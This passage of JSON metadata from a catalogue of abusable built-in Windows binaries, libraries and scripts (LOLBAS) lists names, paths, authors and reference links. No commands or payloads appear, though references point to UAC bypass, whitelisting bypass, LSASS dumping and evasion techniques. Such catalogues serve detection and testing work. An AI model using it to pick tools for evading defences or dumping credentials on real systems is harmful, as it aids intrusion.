@ihack4falafel"],"references":["https://www.activecyber.us/activelabs/windows-uac-bypass","https://twitter.com/ihack4falafel/status/1106644790114947073","https://github.com/hfiref0x/UACME/blob/master/README.md","https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"],"count":1},{"id":"lolbas:wuauclt-exe","name":"wuauclt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"author":"David Middlehurst","created":"2020-09-23T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://dtm.uk/wuauclt/","https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"],"count":1},{"id":"lolbas:xwizard-exe","name":"Xwizard.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn","Nick Tyrer @NickTyrer","harr0ey @harr0ey","Wade Hickey @notwhickey"],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"count":3},{"id":"lolbas:msedge-proxy-exe","name":"msedge_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"author":"Mert Daş","created":"2023-08-18T00:00:00.000Z","contributors":["Mert Daş @merterpreter"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"],"count":2},{"id":"lolbas:msedgewebview2-exe","name":"msedgewebview2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"author":"Matan Bahar","created":"2023-06-15T00:00:00.000Z","contributors":["Uriel Kosayev @MalFuzzer","Hai Vaknin @VakninHai","Tamir Yehuda @Tamirye94","Matan Bahar @Bl4ckShad3"],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"count":4},{"id":"lolbas:odbcad32-exe","name":"odbcad32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"author":"Ekitji","created":"2025-09-04T00:00:00.000Z","contributors":["amonitoring","Ekitji @eki_erk"],"references":["https://medium.com/@thebinaryhashira/living-off-the-land-and-living-above-uac-6a66738d225c","https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"],"count":1},{"id":"lolbas:setupugc-exe","name":"setupugc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"author":"Ang Kar Min","created":"2026-04-20T00:00:00.000Z","contributors":["Ang Kar Min @karminang"],"references":["https://strontic.github.io/xcyclopedia/library/setupugc.exe-3CFE082E8656AD66B5B9FFEB28CF4EC3.html","https://lolbas-project.github.io/lolbas/Binaries/setupugc/"],"count":2},{"id":"lolbas:write-exe","name":"write.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"author":"Michal Belzak","created":"2025-06-17T00:00:00.000Z","contributors":["Michal Belzak"],"references":["https://gist.github.com/mblzk/b8c5ff7c2bd0fb2b385cc2fdd119874b","https://lolbas-project.github.io/lolbas/Binaries/write/"],"count":1},{"id":"lolbas:wt-exe","name":"wt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"author":"Nasreddine Bencherchali","created":"2022-07-27T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://twitter.com/nas_bench/status/1552100271668469761","https://lolbas-project.github.io/lolbas/Binaries/wt/"],"count":1},{"id":"lolbas:advpack-dll","name":"Advpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Moriarty (RegisterOCX - CMD) @moriarty_meng","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/","https://twitter.com/ItsReallyNick/status/967859147977850880","https://twitter.com/bohops/status/974497123101179904","https://twitter.com/moriarty_meng/status/977848311603380224","https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"count":5},{"id":"lolbas:desk-cpl","name":"Desk.cpl","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"author":"Hai Vaknin","created":"2022-04-21T00:00:00.000Z","contributors":["Rafael S Marques @pegabizu","Pierre-Alexandre Braeken @pabraeken","hai @VakninHai","Christopher Peacock @SecurePeacock","Jose Luis Sanchez @Joseliyo_Jstnk"],"references":["https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt","https://twitter.com/pabraeken/status/998627081360695297","https://twitter.com/VakninHai/status/1517027824984547329","https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files","https://lolbas-project.github.io/lolbas/Libraries/Desk/"],"count":2},{"id":"lolbas:dfshim-dll","name":"Dfshim.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"],"count":1},{"id":"lolbas:ieadvpack-dll","name":"Ieadvpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Pierre-Alexandre Braeken (RegisterOCX - CMD) @pabraeken"],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://twitter.com/pabraeken/status/991695411902599168","https://twitter.com/0rbz_/status/974472392012689408","https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"count":5},{"id":"lolbas:ieframe-dll","name":"Ieframe.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Adam @hexacorn"],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/ieframe_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"],"count":1},{"id":"lolbas:mshtml-dll","name":"Mshtml.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://twitter.com/pabraeken/status/998567549670477824","https://windows10dll.nirsoft.net/mshtml_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"],"count":1},{"id":"lolbas:pcwutl-dll","name":"Pcwutl.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey"],"references":["https://twitter.com/harr0ey/status/989617817849876488","https://windows10dll.nirsoft.net/pcwutl_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"],"count":1},{"id":"lolbas:photoviewer-dll","name":"PhotoViewer.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"author":"Avihay Eldad","created":"2025-06-22T00:00:00.000Z","contributors":["Avihay Eldad @avihayeldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"],"count":1},{"id":"lolbas:scrobj-dll","name":"Scrobj.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"author":"Eral4m","created":"2021-01-07T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://twitter.com/eral4m/status/1479106975967240209","https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"],"count":1},{"id":"lolbas:setupapi-dll","name":"Setupapi.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan (COM Scriptlet) @KyleHanslovan","Huntress Labs (COM Scriptlet) @HuntressLabs","Casey Smith (COM Scriptlet) @subTee","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://github.com/huntresslabs/evading-autoruns","https://twitter.com/pabraeken/status/994742106852941825","https://windows10dll.nirsoft.net/setupapi_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"],"count":2},{"id":"lolbas:shdocvw-dll","name":"Shdocvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn","Jimmy @bohops"],"references":["http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/","https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/bohops/status/997690405092290561","https://windows10dll.nirsoft.net/shdocvw_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"],"count":1},{"id":"lolbas:shell32-dll","name":"Shell32.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (Control_RunDLL, Control_RunDLLNoFallback) @hexacorn","Pierre-Alexandre Braeken (ShellExec_RunDLL) @pabraeken","Matt Graeber (ShellExec_RunDLL) @mattifestation","Kyle Hanslovan (ShellExec_RunDLL) @KyleHanslovan"],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"count":4},{"id":"lolbas:shimgvw-dll","name":"Shimgvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"author":"Eral4m","created":"2021-01-06T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://twitter.com/eral4m/status/1479080793003671557","https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"],"count":1},{"id":"lolbas:syssetup-dll","name":"Syssetup.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken (Execute) @pabraeken","Matt harr0ey (Execute) @harr0ey","Jimmy (Scriptlet) @bohops"],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"],"count":2},{"id":"lolbas:url-dll","name":"Url.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (OpenURL) @hexacorn","Jimmy (OpenURL) @bohops","Malwrologist (FileProtocolHandler - HTA) @DissectMalware","r0lan (Obfuscation) @r0lan"],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"],"count":6},{"id":"lolbas:zipfldr-dll","name":"Zipfldr.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Moriarty (Execution) @moriarty_meng","r0lan (Obfuscation) @r0lan"],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"],"count":2},{"id":"lolbas:comsvcs-dll","name":"Comsvcs.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\comsvcs.dll"],"author":"LOLBAS Team","created":"2019-08-30T00:00:00.000Z","contributors":["modexp"],"references":["https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/","https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"],"count":1},{"id":"lolbas:cl-loadassembly-ps1","name":"CL_LoadAssembly.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/","https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"],"count":1},{"id":"lolbas:cl-mutexverifiers-ps1","name":"CL_Mutexverifiers.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://twitter.com/pabraeken/status/995111125447577600","https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"],"count":1},{"id":"lolbas:cl-invocation-ps1","name":"CL_Invocation.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"],"count":1},{"id":"lolbas:launch-vsdevshell-ps1","name":"Launch-VsDevShell.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"author":"Nasreddine Bencherchali","created":"2022-06-13T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"],"count":2},{"id":"lolbas:manage-bde-wsf","name":"Manage-bde.wsf","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Daniel Bohannon @danielbohannon","John Lambert @JohnLaTwC"],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"],"count":2},{"id":"lolbas:pubprn-vbs","name":"Pubprn.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/","https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://github.com/enigma0x3/windows-operating-system-archaeology","https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"],"count":1},{"id":"lolbas:syncappvpublishingserver-vbs","name":"Syncappvpublishingserver.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas","Casey Smith @subtee"],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://twitter.com/subTee/status/855738126882316288","https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"],"count":1},{"id":"lolbas:utilityfunctions-ps1","name":"UtilityFunctions.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick VanGilder @nickvangilder"],"references":["https://twitter.com/nickvangilder/status/1441003666274668546","https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"],"count":1},{"id":"lolbas:winrm-vbs","name":"winrm.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Matt Nelson @enigma0x3","Casey Smith @subtee","Jimmy @bohops","Red Canary Company cc Tony Lambert @redcanaryco"],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"count":3},{"id":"lolbas:pester-bat","name":"Pester.bat","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Emin Atac @p0w3rsh3ll","Stamatis Chatzimangou @_st0pp3r_"],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"],"count":2},{"id":"lolbas:acccheckconsole-exe","name":"AccCheckConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"author":"bohops","created":"2022-01-02T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"],"count":2},{"id":"lolbas:adplus-exe","name":"adplus.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"author":"mr.d0x","created":"2021-09-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x","Nasreddine Bencherchali @nas_bench"],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"count":4},{"id":"lolbas:agentexecutor-exe","name":"AgentExecutor.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"author":"Eleftherios Panos","created":"2020-07-23T00:00:00.000Z","contributors":["Eleftherios Panos @lefterispan"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"],"count":2},{"id":"lolbas:applauncher-exe","name":"AppLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/microsoft-desktop-optimization-pack/ue-v/uev-getting-started","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"],"count":1},{"id":"lolbas:appcert-exe","name":"AppCert.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"author":"Avihay Eldad","created":"2024-03-06T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"],"count":2},{"id":"lolbas:appvlp-exe","name":"Appvlp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fab @0rbz_","Will @moo_hax","Matt Wilson @enigma0x3"],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"],"count":2},{"id":"lolbas:bcp-exe","name":"Bcp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"author":"Mahir Ali Khan","created":"2025-11-13T00:00:00.000Z","contributors":["Mahir Ali Khan @mahiralikhan07"],"references":["https://docs.microsoft.com/en-us/sql/tools/bcp-utility","https://asec.ahnlab.com/en/61000/","https://asec.ahnlab.com/en/78944/","https://www.huntress.com/blog/attacking-mssql-servers","https://www.huntress.com/blog/attacking-mssql-servers-pt-ii","https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/","https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"],"count":1},{"id":"lolbas:bginfo-exe","name":"Bginfo.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"count":6},{"id":"lolbas:cdb-exe","name":"Cdb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","mr.d0x @mrd0x","Spooky Sec @sec_spooky","Nasreddine Bencherchali 